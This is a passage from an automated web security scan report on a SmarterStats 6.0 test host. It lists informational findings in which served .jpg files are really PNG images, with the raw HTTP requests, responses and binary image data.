6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.58. http://vulnerable.smarterstats.6.0.host:9999/Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 18520
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..G.IDATx^..wxTG..........x..|3.o..`cL.9.`.1.......B .HB...IB...Y..."
.". ..B..d.b..$...s..-.....v....}...Q..[......:u.5... .. .. .. .k....uh.............A.a.............    @..|..<...........`................`....y .. .. .. ...9.. .. .. ..:'.....B.@..@..@..@..s..@..@..@..tN..M..................................................6.............9..6...... .. .. ...l.. .. .. .. .s..l:. 4..@..@..@.. .0.@..@..@..@@.. .t>@h...........@.a.............    @..|..<...........`................`....y .. .. .. ...9.. .. .. ..:'.....B.@..@..@..@..s..@..<A o..o......1p.]U>..}N?.........[N.m...k.....mJ......p...i.xT.. I..M........S.\.e...u.Gb.Z..x{cv.....m%..>..N.Aa...w.@..C.......=.....g..... <g/...7..........".
EU.g...+...6k-.1k@...&...42... ......lb.1....|qU..i..z..|.g.W....i\O...o.].[A.b....c.$*1.(.....`..(....0..*C....E.e.fl..`#....V..f.;fS......L..Y/M..../+h.....,_....+..PTbI....-7,..6...... .%.;?>..C.kW.S.6+.dS...l..'.......g.K....[.X..Q1a..5... `................wH.v,..lv<].z..A....r..A....M...~..CM ....@.az..... .$....:...W....as.|.x....Yy.^...w.^......I6&N;..    .@..s..@.....K.)>..v,\.l..G;B.y....-..io...n..W..V|....U.p.&..... .0C@..@@.h9~...z.,@..@@.. .t9,h.....    ....z..go?.......)..lR.P..@..    ...........o ...'..f..D.A...'..v.....~E...@..<D...C`Q-...q...?J...4N..R......`3.... ...    .w..l.@..@@.. ..:2h......p.............`....] ..^!.;Cy.(......3..6=..... .q.'......<..<..@...!....=... `x...dR...........m..l.=......
.>?...... ..z&.....A.@..l.8..G.c.Y.....w.Z..?~.wH"%._.i.....5..6]......%.........f.F*.U...Y.b....Z.q....]....M..+..S........P..G./.?.......=....-..6......!....%....*.YQ(.X...L.f.i.!..u....q}\o..#...5>I.ue..U.0h..E0.@x..C....L..M.........~..".z..No.........d.1j. S3Q....64.v.X0.G....8..,.q......    @.y.8...&%.qd#..+....-W..{.:F],q..&.....cQ.........t..Nft..J...[    @.#A.,....)k.(.....N......@S....,./.'....S.7..j...J...[.p.SA.g    ....).....Ta.*....X... .~..p.|....).Tl\......@...`+1.x0......gO.{.j..J..N..H.'.......q.....w..)...@...`+Q.x8.....5.<....i2BL.7.y.R.x.............C....z...LL.Z....o.....(*.Z...6...v..OW<...b......t..@....l.... `B...j...(5.......:.b....T..,....h.....P....3..O....T!5.6+.7lP0........ .....A.,.8w.e..S..V..Q.I[....T...TU.3oZ.......B..    o.{.x...7..e.......    @....5........U..J.....a..{...XA.....}g...._J.'lV.pZ...[.....R...A.p......Q......._s.j...K....C.S.1k....}C.e...c.k*.X.W...bw..........M...m....|.....h..=...V.3..,._xV...9(B......z.5.....=.6...Vw.6%w.'.... ...    @.aN....!.!..U.V,..tK.....3..,w.    ...V[l`......s.U..G.....@...    @.a>...(..........-n.L.12[    ..M....k*.>s.[..Qt5......4.6..N\ .. .. .0.@..................K......8............q...............<%.....:..@M'').i...V.A....C.kg..QW.G.%R....>....9...&0=..U.[G.......k5..K.j5...9`.^G./...Y.\..H....%Rs.....    ..f.    ......Fu
.B&.vI@...:..*.9`..j....).1o6K..01.8.1.......`3....&'.b....:..p`../.....:.......L..s...".......@.\. ..5....    .w.....?......Q....@a.3...bj>}....g.....v..j........@..k..[..`.L....?...5....G.4.E.-..G.q...1...m..{.L<..u.0...6s.7zkR.....2......n.). v...<..=..C.;.U..6!.....4.m>..l..s..d.x.....;A98...h!..`^b..Q>Zr.)Q.f....5-..6..=:n..|.T....:....g..=d    .....!....o3.hv..lf...........$8%...v...=.;X    2.;|....)O..).......o..`..qE.LN ...T.o.S    qY p...S.J....k..&-.8..7"`..._~t.g    @.....cf%.......nP..uG..:B........n.a..^U.......-..l.5....    <}.35....<k|j./..G..O.-...E....>.{..`...t...@.....G&&...-."....{....X...A.........j0f...5.w...{. .|oL.#....x.5.: ....5...3..gD..w...@..|....o.#zar.k.eQ..[..k+..5...8#..M.K.V.6......o..`..qD/LL.w.V..'...c.....z#W.......t.&.r@.}....O':c6..n2..YS.....xI[f.(...4t.6!......9..l>7....../=H.........E.E....0_`..G.......a'....fz5.W..9..l>7...Y.$..L..6I.`w...Fc7(...|.A.1"9...2....w...cfy=.O..9..l>7.....pr.*.VI.d.g.6..........4...>..Q.m.4Z}d<..z.......>G.......2..6.7R.P.c.Z.:.,..|.A.);T..{.8?[.Q.....@...E...X.....r.7...Y.k7?]$P].3...#..L.K.V..... `0..l..04....3R....n.z../.5.............a.YU!.K..........0...6...Z
..g.=$2.....RC.#.3..&...c...G..#.c.v.Q ..."..f..BS.M...GJ>-.... .    KSv.......T.......M..v../.z..."..f..BS.M.="..Q.k.._ .9.h\....8A..<i. ..._....ZA.D...@.....@r.5...A.G..[.%..6.i.4..Fe.F....9.O...B.A.@. ..4Xh.9    8s.T....F....    ;.*.yy...+........7..6}..Z..J.....-q......X.`U.@.I....j....]4{.q.i ..:'.....B.@..<..OW.....|....,s@f.....T1H......7..6}..Zgr.'...9..U...\.l..U............;a.EnK7.......    @..{|.:......Y.9.........)..^6..... ..f.aB#.H.3.W..J..V..MN....a``s.t.P?..^63~...F"..f..B[ME `Y*...OU...=.,......h9...<...k.Xm.w....#..`3.h...!.i.8......]....w...........::..g......#..`3.h...!....D....m..|.....9.q.j..aP*....4..:
.F"..f..B[MC...x......K...........P...G...K...g.y..Q.0
..6....i......?C.........\}j^6l>0.W:j0..l..04..    LYs....Q.a.@......@z...!6....#..I.9Y3....}..`..x.5 @......2....../.....9.~.Y..3...9i3.......`..X.% ..H..l...[...g....Q]...^..........6...Z......r(...2x?..\......hCN6|.....@..oL."...Y...y^.H.....9.n.iU/........L.6.. ./..l.........<E..QM..?.........6s..
......=.&~#.u.....6}..Zcb.g.&R.o.Q.~s..~.T..q".........=B.$
..w....h.YB..m1........@..k<....8.R..DW$Z....iJQ.:Q.............$.s-..q.z...;.:....$.......6.[....~.@..g,........J....K|}E.....-i...T...*.w.U......F-f.R...00pz..Nc...5.l...+&~3.u.....6...Zbb......I.)......:t:.>..H....x.>..E.Fo.F....Ka` 3..86.$..'........D.A@?. ..3.h..    \..F9..v(.~]..nF.~...hJ...K....w...*.V...7.yP...00.;.:Ff;..5.>B=fo7......~.@..g,.....X...D~.P.=.k@..`sd...Q..v.c.H*.g>......JP.o.Q.....P.ck.(..}...o&....!.....@KLL e........?W..;1u..........N..|...+...$j1.0.A.0s3h?..j.[..K....M.v.. ....l........=.I.G.N5~...u.c.\.....x|{.i.}..D....sO......L..........F...9..2.S....
..K..=!.......o.N....o......b.!.7..7l<....t.G    @.....[.! .........S.Ct=Z......J....r_EPu..`J2q....2....|W...&..f..G.u@ {U..1..C.......eu.fG.6. ................Z..%>...;.:Dd9.ck..N...u...     `n..l...^...f...1..
..k.........G+&......H.}K..........30....9.l|4..x...@.d    @..,<.....?.....
.'B.=\QO.v$...}k7x...-..CcE...j>.(..C.........J    ....3.. ..%H....... .....H...n8x..>=..M..vj..4.k.$...K..6j.5.._,..S...0.3P9S..[.aqt..=.. ..%H....... ..V......`.<lz..E.h......*C.R.    ;.E.qbO.L..p.(..@@.. ..?Fh...xp!.NM~SJ....h.nZ....~.T./>?.M,.vX.    .    ...\t..VK$[^.t...Dt..O..M.c...0...l|..O....2#.S..N.eH.rh}......$j.".o"..Vr.>..q(.jL.E..p.....k. ..f.AB.}...Gb)k.....K..loh....%U.*.J....Q..`..}[p.:F..y...`...L............@..`..D.%p.@.eK.6>...-7.1EN.D]-..A.Ts.Nj.zB..l....-.6.v..-.../"z... ..f.AB.}....It9...c.xI.......^z....A.F.Q.)....q.q..... .|.;.=....l.3....    .
6>...vgy#Z6.#...Ge......Q.<m..F.........&..Q..-.|..d.....l.3....    .
._........4u.'T..Lb.[u.}.?-....$....g.v.<..6.7..C.A.w.@...X.'.$ #.h]C.eQ.....hL..t.O.-.}.!..`N2.;Ay7.-......../h.o..`...Do.F@V...F".....E.h...h..6.c@.%.L;.IiW..v.. .[. .|k<=...h.h..M*nC.......w...tpH~...r.....6..j.+m......    6!..7..`.dUm.0.-.;._h...iL....Ao.Z....G.....0...6#......(s.x..<.'..K.....d=.{.R.M.._.7.Y1..U.....v.....+M.[...........J....M..i#.u9q.(......`3....aG...3...?..x.,.).6.z.l.....+h_.O^1...<.X.gNM.i-..Dh}..`.....y...-M{G..m..{
.)E.N5(..#>....(..;.....v~..#..@..@.d    @..,.=...&...c......%O..Y..+u..;......H.z...>Joy.^....lPkS...eD}D.......J.y.........1.......o.....B............._.:..-..{...T..{z...B.A..@....6L....a+.....Y....e.....).9...........o.z.,.Z{.^.b.........~_...........`...PT.m.@9...M./.Z..^.mJ7...}...6../
.z.&.nl.&.hD.'..].[PJ....Ai.....g..snn.4...........G.Ms..f..oS...l..7..{.....aB..-...t.....J[C.3.r|.......lf.......7i...-..'..X.&..B...]R..{W...;...hu.2...V.{......    .....x.......h.n    6;.5...)..?>......\^R.y{.x....7.
6%....>k?.oIy..h..........w(.X#
<.T......cJ...]...S....
....n,C7.l....y .. ....l......*.
6....9Z>U.@...Y-...j.n/.M......:...I..F.6...j@..o....J+'.....
M>.L.&.hJ.....].Sf...-.Y....@O......Rf.0=.;... ..N..`s...opY.17.]..c..y....-..io.S..eG.N.kL...Oh.X.c/.#S<l.....ET......#K!......h...N...5h..........BY....=......    ..?0........
..6_.I....RF..............P.........MMo...IiD..-M'.u.".f....k..-)...........M....i. 22.~..').(.. .....f...0.C..LOV.t.e.(6.l.`8..U..N.Op.`..h...4-....mz....9....B;..#..\J....vtcY.8..3g..e.h...0....?...._.o.....A...7...00.....N.X.s.,*......!...Vty...7-n.....<MOo....E._W.s=z...-[RL.2B.}Th.........(&&.......A`` ......t}..`..x.5&$pi.(.....mCS.uK']...:tr......%..CA..Q.......f....t.gw:..W....1}..=zr.s..Mo&.....Aaaa..~....a;v.X,...;]....6.pE. M@&...}..YX.]........)....0.......g.......V.lBY.{.b...C;....+].Xb../??Q....b......`..VM...9R.;
......`...R .1..oe..qo....-..%v..=\............o....hfFG.....4lh.:..g6-.z.:....k..X..Rt/o...q...-[ . ....
..7    @.y.6...v.pj._..;.m[:.m......Nt#.*...O%.m...4.D;.u.#......i..t..^t...mZ.......B.}\....L.....^||<-_...MB..y.v...x,q...hC..M......"plji....*;E[....{.....2g.R.i..._....fet.....!..jL.....e.%......+._..D..........c.`...6...m.h..)R.Q..@@....:#......^..n.+.X..oB...../[...Kj....S.Hp...4.>..f...u......}@.}...c.......in.W......c..c.........0..j....7./1.........6.Q...E..#..5Se........{x..l.@..K+.E...g
I.M!.]K..Nt..'.../.S.._..=......    ......+-...^..;v@..)....h..%n.....@.%..6.......3E...I.4.[1..h._h.....2.r...f~\..gQ.Z..!e....65mJ....b..M;...t...U..^6.^F.I..a..v.......6. ....Z@.m.r'.."..[.{..#..[...S...i............[.............(%..=...M.....l.K...%........@F.-\....:$A.E@..d.@..PB.........Z..*ql....O.....R..7.oZ..w(.`[!.>...:...N.M.}{P..lj.QE..mjNOr?.i.....c{]j.-ql.k....`....,).(.. .N..M..J..W..IO...W....;...3....ntyaU....E...i......C.6...4._]..8P.B..K.Ow.b.s../.-zx...XN.8....C...0..d....S....R.Q..@@....:#.....x...J..[u....../....Vt*.m.%6.|7.....5....k....}....|...e..Ka..+.B.8.3;...3...2::...[.,..^e s....?.x.B.7
......`Sg.. .5.i3..............6....tcIm...w.%..47."......v..u.Z....I9..K..O>...e.X.....kN.....K.$QQQt..aX1.,`.6. ...4C!.p....S.P..<K.....    )..eS..
.fm?...3.J........Ja;[..sB......O..k..!.dm.H.....!z.K...K.J.....QPP.......j.m....t.R..,...LF...d........7.P....Tmj#.Z?.9....4P.i[G.7.G....=i~.......P.qe(..o..........X..j.....c..../[Q/#o.P.l....^J\ .....`..%j..M.....{.?t.e{...Hp..Hp..Z3./...5-.....~.3....m...........N..4.b.....Y..8......#G`V.d6....Snn.&..*....'......:#p+me.x.........,.../..$.-E..>..Y}o..5..CjQ..aN..J.........U.|.)..#..K\.!.L..lE......{.*..c...$C..p......P...A...O.....E\]E.=Y)b.f.E{F....o........i...B...E..4..<.    u.P.2..M..~....2.f.zG...R. .7.Y.7.a....=z.`..xyXm9.g.JM/....    @.9..7...    d-.gg....L.#............"......8....cVy....].>.i;)..ZPE..~m...^..z.H}..=D.)b..../.d6..H*.?.    .$..f.qG.uN.ZN2....S..zE.Y....M(.|......oh..8r.K.......;D.....U....R3`..y.u.V.../..r({.......SR|Q..@@....<+......r~}..\..`c.67.'-..`8.;..u.X.2...K~~.Y.H....
....i.|..t.[RR......5...Mm9...&L.@?...W..<...@......>....s;...W.A./.N;....|m8.4.............Mi......Pi..B..8.../RHH..?~..&.0.w..W....... ..g..A@3.=B......^6>nj.....    .:.7~.....nYT.Jtv];!..u...cc...E....T=l...T..... .=..6...F......(..R....l.9............~C.r@.[6.\..}..!..;eG7W..W6I..{....M-.d.Cy.400..../...@...#..../.....x..)}2.......e...A......G..E.Z.%.X.e..
...C.o.p...4...C.....ff....P....N(.....`s..n.......M8.....B19.tk.wv...+..q......(..{.,..i.'...._^j.322.....4S..U....d..-.......`..W.
...p......b/~.K.:7..M)K...........{......6.%K...=.@u.x.#.c3.`....v...S.N...o..D......@...w..W    l>...-...,:.d].....^..;..]}
...r'N..6w.@.GU.bm.Kvts%.8.Y.f....M).d6.`w.W...0...`3.....# ...7 .`[vq.n,xo.....N....n..R.6.g?.q...lA....&BBB..Z..N.8a*..s2.5$...F(..n..`s..n........y.f..$....,&{8u..>......].ZYD.
...1=..p..f}.t........U....;h...8..{_.x.I    @..t..mc..[........E..1.........P....+~..4>.....B..u.....~....d....<y..b..@.....K.6lPe.. .....`s........v."..[....R.g.x...4.......G.Q.q..U....e.M.a....?.w.R...{y........%>'..&.......
..&. .4..J@.{....D...O?`/[.....r@.....1.<...@W.M.....H...........f.}<Pj.8.m..5t..i.7^............. .y..l.g.'....8.G.E....g.6_..[uI.6/...v4aD=..>]s.#Rz..]Ql6....:...n.#5>...x.b..k,He.k......I.C!.....@....w.@...t3.>._Ujit.....3.V_..5[.6.zN,G.S..jP.....=m._S..In....().u.86>r...}....Z...x(....`SE.. .O..;&...j..l.e.v......5..{.z.HI..............B.Mv...c.2e..}JOO.Y..........{...]..l.;...............R.m....wy..m..N.0.6].9.c....ty........\r..86...Ib}U....E.....{.$....aA.@@........j4......i...B._    ..->=.zLz.r......=b....)=.........#[.H.....9s.|.x.7%%Ej...kR...@@S..l..De .}..2....9/[.h.J.B.y.>.[...z.5!.<egEJ..U.
..tM...'.8.?J.%..........Rb.5...B .9..6...B..>.y[...uN...]i..)...m=h...t-$..vh. .m...kA....K..{.....9?t..Oy.8..L....IM.......`..VT
..%..l.c;........MI.q.3Z.;U.[.5........t}...ZR...~PUzv+X3.......'5h....u.V..l..'...S...
..G.@.y.+*.....r+...@~.....h[ r...:.m........n...q[..5..........8.....Vj....O,\..=..&...g.N.    ....\ ...'...}.x".hN...}....?...D........_...3\..b...c....p.Xt.j.....k.5..7.H..q..."]./.6..k.......Q... P2. .J.;.
...8tn...v'.1....../..TR].....}(.Z...:{".......@y..y.B.+M...#.n.hj.....7N./F.m....B..5Ne2O./.....#..Vr..d.p.@...h.....O...+1m%.[*.4jY..xm.9c..4...](o...Xnh(..W......e.i.T.[bb.a.[FF..&....g..z8........[. .....A.....2..o.l....Ch....l.O[pF{e...k.Um~...;.C.[..k..<[.....w.4.+.{..=.....ql.qk.}....].vIqA!......`..[....!..4^..zl.j.J....w.........ci.......t.>....5...-........W.bm...0w..Y.wU.\..M.".off......R..,...*5.P...B...+...]...C.u.Tn...7.R1...=..i...,.....h.k.S....W.KW.d.T.E......i..96m...4..-....UK...6...bm.Gl......r....../-.;w.0.qw21k\..j.+...GR<P..@... .<......+..@.I.9u.......%O.P..1.....+..I...5].{....hsvy.r*...m..Vh.....'..../...j.../.D......LjH../..;.|..g.a...=%.....\...O@... ....l.....$..*....R.w.\.,...\...9.....,.&.7.g.N..m.m........bW..l....U.B.@.][...r.s.8...$.....acO.3bm.......@@?. ..3.h..    .*.
<j.....P=.$..+.B.F..f....G.~W....,....G.....k;..Q...%KJ.BJ.K..&.y.Y..{(6\.Y.7)../^.9.T...,].{...k.7o...'..k..8.....w.@.y.3..G.21l..:.`c.6.DA.<.$..m..o...E......>..N....A:<..u.[J..zS...m..g.........Q..c{...q>6.xp..y]...sF..i..g.....(y...T\ ... ....q@+J..;.6.f.........^.l5..nY......f...x...k..0...c.j...K.....l..t...n
/........c).....^.G...Zt..&)........b.x.5.......+V.8*...B .Y..l.....L.U..J....M......q../jL.lQ.m.VT..~.(.M.B....r'O..`.;`...WCl6X.Q.p..e....B.c[.fegg.....9.dp..).....RS..@.c. .<............./w.^...+.D=...]'.}N.WV...6".:}<.]:..U..f.oY.{.uq....K=j.?.N.&6.b-..v..D.....n._c/......AY.-..H.Sh..}.6.H.f.
....@.y.-j.;....".jE.c..M>..^..=.H.kcqV|.........M.f.q..8.n.#.n.[..[...._.......%..N..=P...~.I.c../=XZZ.t.5K>6^....S.+.HU....x....G..r.0...k.;..Jxy.i..J4b@9U.VD.}.%].5.n-_....T.n........vlkm.8.Y..|.SI
6..9s..E.qZ..l.\X"u.....v. ..c..@...x.t..!.ydU...*u.....Pk.f...>...N.B.......... .[9.....^..#....6n.......S".;TSSS....".,..K........`3.... .i../....e(.U%..k..[f..ti.h%..-..q......j <kK.b./M.ql..0sR.E.<...l.......5..o/..%..v...........@...S.....R#(Q...K4.E@..s..@.&...C.G..........n,....E......H..z....?.b.U.bm..,q..........c.+R.xS.....c...j....g...o,.*bmx...hy.0\..pE...i.l.s...I......V.......aWv.@+j....-4.n,..z......<...-Rc8.]"........+.f..*....R.9....#^.m.........%"w..1k2.<.DjW..Qx.......x.....|x.Ko.E....XyK.......B.....L...{..........
Z{
........e.A......^......,...V..u.....5.n.....)g.`."<i7D./......B[..3%.......+..N.e%7....R.,ql|\...=x'N.pI.qR...p..s.T\)..%R.<E.Wa...(SD.+K........;...+.J..)uX.g......,....P.+.    ..+..{tG..MwC....~    .x.......V.D.....P....s..vq.P%9ot....i..k...."&.v.=...g....+].IN#.~8V.R7....^........K.1N.{.......75s.L:y..T_.-.K.|..H....q\ _....`..l...x..
...Y.t....`..W..U}.`c...2G.;.Kg....    .....l>2....x....m...ZX."m.K..Z....V\...y......S.[.....=.>D.-?9.6...'...
3.@+....()..Rql....)bG...5.U..!.4.....r.1c..O)p...H..\*...P ..y..
6;.9%...k.tjO.z.....G..Mc....a..x.:..>..U.@...v.ys.........
,{.....\..t....S..KZx.8......Q.Gf...(.=zd..d....`.|h.;V\x...tY.Y.."mt..f}....|..|.    @.........R.).km..Q....6h..p;..1E.~.D.[....ql..211.-..qj|Z....]..q...q.Dl..Y'.p....].E.X..3W..l}Nx..,.".....G..........K.7'.........5k...M..o.B...Y.D...#.....R.i.c.|.29k.....g..            .....z.s....X.,..M$.P.|..LG.6....N..3Y........`..v..._^E,...^M:...    FT.. `M.2...;?w...(.9!.reJ..+.I......5h......#...c{]jp-qlW.\!Y;w...?~.eo..`...Qv.r.\ ...G......=...'.Y..<'..-.=.......n.H....V-.d.K.U.C..............i).......P..7......R+.U.]....7......l......`3.... .i.O.>..5j.....x..q......y.}Z*...Q...l.6].a...X.D....jtx._...yR...3O9.Yq..oD....\..eO.....^..".    .N... ... .|{|.;..:..|.C$...X......s.....S<p.qa..q|$..w.....=..8.Z...tbKi:...iK.o....tf.W..Q.Lw...+E.sss.Sr........]||<.7.^5.aA!..    ..l>1..........)..$.......E.......Vo)...&9.....(sG.];TAIp+c...r....J]l;..Q....f...k.....r-h?//O    .w5....m...J.......9\ ...!..f..FOA...8V-.Y3.<....l..W6.T.S.;..."......C.    5.....r3.....>..i{. .].vi..."..."##)88....4m/*...0...6c..Z    .. ._....8RH/........m......4.l..m....+qj,...@..B. `L..l..7...tI.7...Uz...*.?...Z.8...,..7.}n.j|...w.P....A .[..l...4...E.7......}hss....h<..M..u."..._.x.,BM........ ......^.@..(.{...T..o.6~.3ql.M.e...@.7o..Q... ...    @.aN....M@-....p..........Xx......s..X.B.......$......Y `@..l..44Y...X...?Q.b.x......tJ...".<[.....J...DR.w.....L.5....m%!.X....Z..'m..e....x...x..tyXq#.........D..%~d..l9.8...?u...V....^.b......l..^........3...'..qQ...7 p.[........&.o.....>B...G....A...b.c%..x.,^0.\..\..n.v(.....Vbv..P.q...hUg....6[..C.-..a{..Jk.....
..N.......kN6.f...l...E..5.5.....I....&..f.........X.D...E,)..".....o..,B.....|...v..?..V(..KW.^...i......wnZ.1..u.8I...o...J.......@..l@..    ..a+"..x...2.....N...........K.\V........MO\.3.x.l......f...[6.B...^..#.p.ql.@..@... ..<zh.c.6.D...+qeV....-.n)..
=tN..r...kQ..].VDP..l.7T..l...........k;.hb{.5.........@.9...E....".H..f.....SN....+.a..9{...<lVr.a...;.a.....r.6..[....(:W.B{.....U+.........@...A......V.B........aSb.l...kS.o....P.@....T...
k......_WC..B.i..5...H..`.F...# .....Q.i.7+.....%...`6.w.@........+.........V..-X.t.K.Q...o..u..........%#....Q.?._h.W...niAQ...X.yl......q..\K}/=||a.J.+.].(..5...@..<E...SdQ.).....9T.|.
...3.4/w.......g..*+..E...i.tWi.K..b+|Gn~.
.Y..z.......V..).f....'|Z.B.WX....C..@..<G...slQ.......W..B.y{jl...v...lVqnE...l..VB.P...G..Y._Q.........s.......>!..X..m......j...p....{.p7.....$..ob....n\.D...M!...0G......[.........8k...f.Y.&..c..l.! .. ...;.<.E.C.TtI.h....6..&.Kw.O..4Z .,.kj.;.... ..%E....... ...%P.Q...,....9^..O............4. v....K...=Rb.........@..k..[.....(..p...XS.h...Y.....fS...K4.;\..@.:U...KN#6...@@{..l.3E. .. .. .. .)..6Mq.2................LQ#..........hJ..MS....@..@..@...'...=S... .. .. .....`..'*............    @.i..5....M ..[.F......./..^k.M.....5?....e]F....F. .. ....l...ZA...%`.f..I..#......F.............M..s.H&..ZQQ'.....VL..F...^{M.B.\a../...
..Y....{......`....i `v...i...K..bo......8... .[..l...4..@..,....Y.Z..&"...V......6;....@..tJ..M...f...(n4!.
.EY|.f.[b...........W..A..@@.. .t:0h...@>.^...4.....D`'.M.<......N    @..t`.,......g...,.6..6gc....t.....)..6...... P....5%..5."....6....87K..ej.<......N    @..t`.,.............`.\..............`....y .. .. .. ...9.. .. .. ..:'.....B.@..@..@..@..s..@..@..@..tN..M....................................................4.n........IEND.B`.

10.59. http://vulnerable.smarterstats.6.0.host:9999/Temp/f8ef6da096584c109a8620d83d0d2462.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f8ef6da096584c109a8620d83d0d2462.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f8ef6da096584c109a8620d83d0d2462.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
